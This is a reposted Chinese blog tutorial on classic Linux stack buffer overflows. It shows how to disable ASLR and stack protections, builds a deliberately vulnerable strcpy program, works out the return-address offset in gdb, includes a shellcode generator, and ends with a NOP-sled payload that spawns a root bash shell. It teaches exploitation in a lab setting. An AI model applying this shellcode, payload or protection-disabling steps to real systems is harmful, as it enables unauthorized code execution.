Linux下基本棧溢出攻擊

轉載請註明出處：http://blog.csdn.net/wangxiaolong_china

 

1.1    Linux棧溢出保護機制

基本的棧溢出攻擊，是最早產生的一種緩衝區溢出攻擊方法，它是所有其他緩衝區溢出攻擊的基礎。但是，由於這種攻擊方法產生的時間比較長，故而GCC編譯器、Linux操作系統提供了一些機制來阻止這種攻擊方法對系統產生危害。下面首先了解一下現有的用於保護堆棧的機制以及關閉相應保護機制的方法，爲進一步分析基本棧溢出提供了良好的實驗環境。

1.       內存地址隨機化機制

在Ubuntu和其他基於Linux內核的系統中，目前都採用內存地址隨機化的機制來初始化堆棧，這將會使得猜測具體的內存地址變得十分困難。

關閉內存地址隨機化機制的方法是：

sysctl –w kernel.randomize_va_space=0

2.       可執行程序的屏蔽保護機制

對於Federal系統，默認會執行可執行程序的屏蔽保護機制，該機制不允許執行存儲在棧中的代碼，這會使得緩衝區溢出攻擊變得無效。而Ubuntu系統中默認沒有采用這種機制。

關閉可執行程序的屏蔽保護機制的方法是：

sysctl –w kernel.exec-shield=0

3.       gcc編譯器gs驗證碼機制

gcc編譯器專門爲防止緩衝區溢出而採取的保護措施，具體方法是gcc首先在緩衝區被寫入之前在buf的結束地址之後返回地址之前放入隨機的gs驗證碼，並在緩衝區寫入操作結束時檢驗該值。通常緩衝區溢出會從低地址到高地址覆寫內存，所以如果要覆寫返回地址，則需要覆寫該gs驗證碼。這樣就可以通過比較寫入前和寫入後gs驗證碼的數據，判斷是否產生溢出。

關閉gcc編譯器gs驗證碼機制的方法是：

在gcc編譯時採用-fno-stack-protector選項。

4.       ld鏈接器堆棧段不可執行機制

ld鏈接器在鏈接程序的時候，如果所有的.o文件的堆棧段都標記爲不可執行，那麼整個庫的堆棧段纔會被標記爲不可執行；相反，即使只有一個.0文件的堆棧段被標記爲可執行，那麼整個庫的堆棧段將被標記爲可執行。檢查堆棧段可執行性的方法是：

如果是檢查ELF庫：readelf -lW $BIN | grep GNU_STACK查看是否有E標記

如果是檢查生成的.o文件：scanelf -e $BIN查看是否有X標記

ld鏈接器如果將堆棧段標記爲不可執行，即使控制了eip產生了跳轉，依然會產生段錯誤。

關閉ld鏈接器不可執行機制的方法是：

在gcc編譯時採用-z execstack選項。

 

1.1   基本棧溢出攻擊原理及實驗

下面，將用一個棧溢出攻擊的例子的方式，來詳細的講解基本的棧溢出攻擊的詳細方法步驟。

在進行試驗之前，先利用上面講解的方法，將相應的棧保護機制關閉掉。

root@linux:~/pentest# sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
root@linux:~/pentest# sysctl -w kernel.exec-shield=0
error: "kernel.exec-shield" is an unknown key

代碼如下：

root@linux:~/pentest# cat vulnerable.c
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
	
	char buffer[500];
	strcpy(buffer, argv[1]);

	return 0;
}

編譯源碼：

root@linux:~/pentest# gcc -fno-stack-protector -z execstack -g -o vulnerable vulnerable.c

用gdb調試該程序：

root@linux:~/pentest# gdb vulnerable
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/pentest/vulnerable...done.
(gdb) disass main
Dump of assembler code for function main:
   0x080483c4 <+0>:	push   %ebp
   0x080483c5 <+1>:	mov    %esp,%ebp
   0x080483c7 <+3>:	and    {1}xfffffff0,%esp
   0x080483ca <+6>:	sub    {1}x210,%esp
   0x080483d0 <+12>:	mov    0xc(%ebp),%eax
   0x080483d3 <+15>:	add    {1}x4,%eax
   0x080483d6 <+18>:	mov    (%eax),%eax
   0x080483d8 <+20>:	mov    %eax,0x4(%esp)
   0x080483dc <+24>:	lea    0x1c(%esp),%eax
   0x080483e0 <+28>:	mov    %eax,(%esp)
   0x080483e3 <+31>:	call   0x80482f4 <strcpy@plt>
   0x080483e8 <+36>:	mov    {1}x0,%eax
   0x080483ed <+41>:	leave  
   0x080483ee <+42>:	ret    
End of assembler dump.
(gdb)

此時在調用strcpy之前，main函數棧幀結構分析如下圖所示：

根據此時的棧幀分佈可知，要想控制eip的值，就必須往buffer[500]中至少填入508B的內容。

接下來我們繼續用gdb調試：

(gdb) b *main+41
Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
(gdb) r `perl -e 'print "\x41"x508'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`

Breakpoint 1, main (argc=2, argv=0xbffff264) at vulnerable.c:11
11	}
(gdb) c
Continuing.

Program exited normally.
(gdb)

往buffer中填入508個字符的內容，程序正常結束並退出。這說明棧並沒有溢出，填入數據量太少。可是，正如上文中我們分析的那樣，程序理論上棧溢出確實需要508個字符就可以了。問題出在哪裏呢？重新分析代碼和反彙編之後的代碼，我們不難發現，問題產生的原因在於“0x080483c7 <+3>:       and    $0xfffffff0,%esp”這條語句。下面我們將繼續用gdb調試，分析一下該語句如何影響我們的溢出的。

(gdb) disass main
Dump of assembler code for function main:
   0x080483c4 <+0>:	push   %ebp
   0x080483c5 <+1>:	mov    %esp,%ebp
   0x080483c7 <+3>:	and    {1}xfffffff0,%esp
   0x080483ca <+6>:	sub    {1}x210,%esp
   0x080483d0 <+12>:	mov    0xc(%ebp),%eax
   0x080483d3 <+15>:	add    {1}x4,%eax
   0x080483d6 <+18>:	mov    (%eax),%eax
   0x080483d8 <+20>:	mov    %eax,0x4(%esp)
   0x080483dc <+24>:	lea    0x1c(%esp),%eax
   0x080483e0 <+28>:	mov    %eax,(%esp)
   0x080483e3 <+31>:	call   0x80482f4 <strcpy@plt>
   0x080483e8 <+36>:	mov    {1}x0,%eax
   0x080483ed <+41>:	leave  
   0x080483ee <+42>:	ret    
End of assembler dump.
(gdb) b *main+3
Breakpoint 2 at 0x80483c7: file vulnerable.c, line 4.
(gdb) b *main+6
Breakpoint 3 at 0x80483ca: file vulnerable.c, line 4.
(gdb) r `perl -e 'print "\x41"x508'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`

Breakpoint 2, 0x080483c7 in main (argc=2, argv=0xbffff264) at vulnerable.c:4
4	int main(int argc, char **argv) {
(gdb) i r esp
esp            0xbffff1b8	0xbffff1b8
(gdb) c
Continuing.

Breakpoint 3, 0x080483ca in main (argc=2, argv=0xbffff264) at vulnerable.c:4
4	int main(int argc, char **argv) {
 (gdb) i r esp
esp            0xbffff1b0	0xbffff1b0
(gdb)

通過調試可以看到，在執行“0x080483c7 <+3>: and    $0xfffffff0,%esp”語句之前，esp的值是“0xbffff1b8”，在執行完該語句之後，esp的值是“0xbffff1b0”。故esp的值減少了8，也就是說，要想控制eip的值，還需要多填入8個字，即需要516個字符來填充buffer。

(gdb) r `perl -e 'print "\x41"x516'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x516'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

可以看到溢出成功！

下面我們用gdb調試，看一些溢出的過程，具體分析就不寫了，相信熟悉gdb的話對這些調試信息會一目瞭然的：

(gdb) b *main+41
Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
(gdb) r `perl -e 'print "\x41"x516'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x516'`

Breakpoint 1, main (argc=0, argv=0xbffff254) at vulnerable.c:11
11	}
(gdb) i r ebp
ebp            0xbffff1a8	0xbffff1a8
(gdb) i r esp
esp            0xbfffef90	0xbfffef90
(gdb) i r eip
eip            0x80483ed	0x80483ed <main+41>
(gdb) x/550bx $esp
0xbfffef90:	0xac	0xef	0xff	0xbf	0xf6	0xf3	0xff	0xbf
0xbfffef98:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xbfffefa0:	0xa4	    0xf0	    0xff	    0xbf   	0x08	0x00	0x00	0x00
0xbfffefa8:	0x3c  	0xd5	0x12	0x00	0x41	0x41	0x41	0x41
0xbfffefb0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbfffefb8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbfffefc0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbfffefc8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbfffefd0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbfffefd8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
………………………………………………………………………………………………
0xbffff198:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff1a0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff1a8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41
0xbffff1b0:	0x00	0x00	0x00	0x00	0x54	0xf2
(gdb) 
(gdb) stepi
0x080483ee in main (argc=0, argv=0xbffff254) at vulnerable.c:11
11	}
(gdb) i r ebp
ebp            0x41414141	0x41414141
(gdb) i r esp
esp            0xbffff1ac	0xbffff1ac
(gdb) i r eip
eip            0x80483ee	0x80483ee <main+42>
(gdb) x/10bx $esp
0xbffff1ac:	0x41	0x41	0x41	0x41	0x00	0x00	0x00	0x00
0xbffff1b4:	0x54	0xf2
(gdb) stepi
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141	0x41414141
(gdb)

既然我們已經找到eip返回地址的位置，那麼就可以覆寫返回地址，控制程序的執行流程。

接下來，首先需要一段shellcode，關於如何編寫shellcode的問題，我們留到下一節講解，這一節中我們使用一個從網上找到的shellcode生成程序來生成一段shellcode。Shellcode生成程序源碼爲：

/*
[] Shellcode Generator null byte free. []
[] Author: certaindeath            []
[] Site: certaindeath.netii.net (at the moment under construction)	 []
[] This program generates a shellcode which uses the stack to store the command (and its arguments).   []
[] Afterwords it executes the command with the system call "execve". []
[] The code is a bit knotty, so if you want to understand how it works, I've added an example of assembly at the end.	[]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/types.h>
#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command

void print_c(__u8*,int);
void push_shc(__u8*, char*, int*);
int main(int argc, char *argv[]){
	char cmd[255], *a;
	FILE *c;
	int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2;
	__u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0};

	if(argc<2){
		printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
		       "|      Shellcode Generator      |\n"
		       "|        by certaindeath        |\n"
		       "|                               |\n"
		       "|  Usage: ./generator <cmd>     |\n"
		       " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
		_exit(1);
	}
	a=(char *)malloc((9+strlen(argv[1]))*sizeof(char));

	//find the command path
	a[0]=0;
	strcat(a, "whereis ");
	strcat(a, argv[1]);
	c=popen(a, "r");
	while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c)));
	while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c)));
	cmd[--k]=0;
	
	if(k==0){
		printf("No executables found for the command \"%s\".\n", argv[1]);
		_exit(1);
	}

	if(strlen(cmd)>254){
		printf("The lenght of the command path can't be over 254 bye.\n");
		_exit(1);
	}

	for(i=2;i<argc;i++)
		if(strlen(argv[i])>254){
			printf("The lenght of each command argument can't be over 254 byte.\n");
			_exit(1);
		}
	//work out the final shellcode lenght
	b=(k%2);
	b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
	totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
	for(i=2; i<argc;i++){
		k=strlen(argv[i]);
		b=(k%2);
		b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
		totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
	}
	totl+=4*(argc-2);
	printf("Shellcode lenght: %i\n", totl);

	//build the shellcode
	shc=(__u8 *)malloc((totl+1)*sizeof(__u8));
	memcpy(shc, start, 2);
	if(SETRUID){
		memcpy(shc+shp, struid, 10);
		shp+=10;
	}
	if(argc>2)
		push_shc(shc, argv[argc-1], &shp);
	else
		push_shc(shc, cmd, &shp);
	memset(shc+(shp++), 0x89, 1);
	memset(shc+(shp++), 0xe6, 1);
	if(argc>2){
		for(i=argc-2;i>1;i--)
			push_shc(shc, argv[i], &shp);
		push_shc(shc, cmd, &shp);
	}
	memset(shc+(shp++), 0x50, 1);
	memset(shc+(shp++), 0x56, 1);
	if(argc>2){
		for(i=argc-2;i>1;i--){
			memset(shc+(shp++), 0x83, 1);
			memset(shc+(shp++), 0xee, 1);
			memset(shc+(shp++), strlen(argv[i])+1, 1);
			memset(shc+(shp++), 0x56, 1);
		}
		memset(shc+(shp++), 0x83, 1);
		memset(shc+(shp++), 0xee, 1);
		memset(shc+(shp++), strlen(cmd)+1, 1);
		memset(shc+(shp++), 0x56, 1);
	}
	memcpy(shc+shp, end, 16);
	print_c(shc,totl);
	return 0;
}
void print_c(__u8 *s,int l){
	int k;
	for(k=0;k<l;k++){
		printf("\\x%.2x", s[k]);
		if(((k+1)%8)==0) printf("\n");
	}
	printf("\n");
}
void push_shc(__u8 *out, char *str, int *sp){
	int i=strlen(str), k, b, b1, tmp=i;
	__u8 pushb_0[6]={0x83,0xec,0x01,0x88,0x04,0x24},pushb[6]={0x83,0xec,0x01,0xc6,0x04,0x24};
	memcpy(out+(*sp), pushb_0, 6);
	*sp+=6;
	for(k=0;k<((i-(i%4))/4);k++){
		memset(out+((*sp)++), 0x68, 1);
		tmp-=4;
		memcpy(out+(*sp), str+tmp, 4);
		*sp+=4;
	}
	b=(i%2);
	b1=(b==1) ? (((i-1)/2)%2) : ((i/2)%2);
	if(b1){
		memset(out+((*sp)++), 0x66, 1);
		memset(out+((*sp)++), 0x68, 1);
		tmp-=2;
		memcpy(out+(*sp), str+tmp, 2);
		*sp+=2;
	}
	if(b){
		memcpy(out+(*sp), pushb, 6);
		*sp+=6;
		memcpy(out+((*sp)++), str+(--tmp), 1);
	}
}
/*
Here is the assembly code of a shellcode which executes the command "ls -l /dev".
This is the method used by the shellcode generator.

	.global _start
_start:
	xorl %eax, %eax			;clear eax

	subl $1, %esp			; "/dev" pushed into the stack with a null byte at the end
	movb %al, (%esp)
	push {1}x7665642f

	movl %esp, %esi			;esp(address of "/dev") is saved in esi

	subl $1, %esp			;"-l" pushed into the stack with a null byte at the end
	movb %al, (%esp)
	pushw {1}x6c2d

	subl $1, %esp			;"/bin/ls" pushed into the stack with a null byte at the end
	movb %al, (%esp)
	push {1}x736c2f6e
	pushw {1}x6962
	subl $1, %esp
	movb {1}x2f, (%esp)

					;now the vector {"/bin/ls", "-l", "/dev", NULL} will be created into the stack

	push %eax			;the NULL pointer pushed into the stack
	push %esi			;the address of "/dev" pushed into the stack

	subl $3, %esi			;the lenght of "-l"(with a null byte) is subtracted from the address of "/dev"
	push %esi			;to find the address of "-l" and then push it into the stack

	subl $8, %esi			;the same thing is done with the address of "/bin/ls"
	push %esi

	movb $11, %al			;finally the system call execve("/bin/ls", {"/bin/ls", "-l", "/dev", NULL}, 0)
	movl %esi, %ebx			;is executed
	movl %esp, %ecx
	xor %edx, %edx
	int {1}x80

	movb $1, %al			;_exit(0);
	xor %ebx, %ebx
	int {1}x80
*/

使用方法是：

root@linux:~/pentest# gcc -o shellcode_generator shellcode_generator.c
root@linux:~/pentest# ./shellcode_generator /bin/bash
Shellcode lenght: 45
\x31\xc0\x83\xec\x01\x88\x04\x24
\x68\x62\x61\x73\x68\x68\x62\x69
\x6e\x2f\x83\xec\x01\xc6\x04\x24
\x2f\x89\xe6\x50\x56\xb0\x0b\x89
\xf3\x89\xe1\x31\xd2\xcd\x80\xb0
\x01\x31\xdb\xcd\x80
root@linux:~/pentest#

現在，提供一種填充buffer覆寫返回地址的方案（不唯一，只提供一種可行的方案）：

#################################################################

“\x90” * 431  +  shellcode(45) +  shellcode地址(4字節) * 10  ==  516B

#################################################################

其中，“\x90”代表NOP空指令，故shellcode地址可以替換爲自buffer起始地址和shellcode起始地址之間的任意一個地址。

到目前爲止，我們已經構造出了我們的溢出代碼，如下：

(gdb) run `perl -e 'print 

"\x90"x431,"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80","\xac\xef\xff\xbf"x10'`

The program being debugged has beenstarted already.

Start it from the beginning? (y or n)y

Starting program:/root/pentest/vulnerable `perl -e 'print

"\x90"x431,"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6

\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80",

"\xac\xef\xff\xbf"x10'`

process3724 is executing new program: /bin/bash

root@linux:/root/pentest# exit

exit

Program exited normally.

(gdb)

可以看到，我們的溢出代碼成功的執行了shellcode，並獲得了相應的shell。

到此爲止，棧溢出攻擊成功。

 

附：由於%gs驗證碼的存在，在開啓%gs校驗時，上面的方案只能在gdb調試環境下成功完成棧溢出。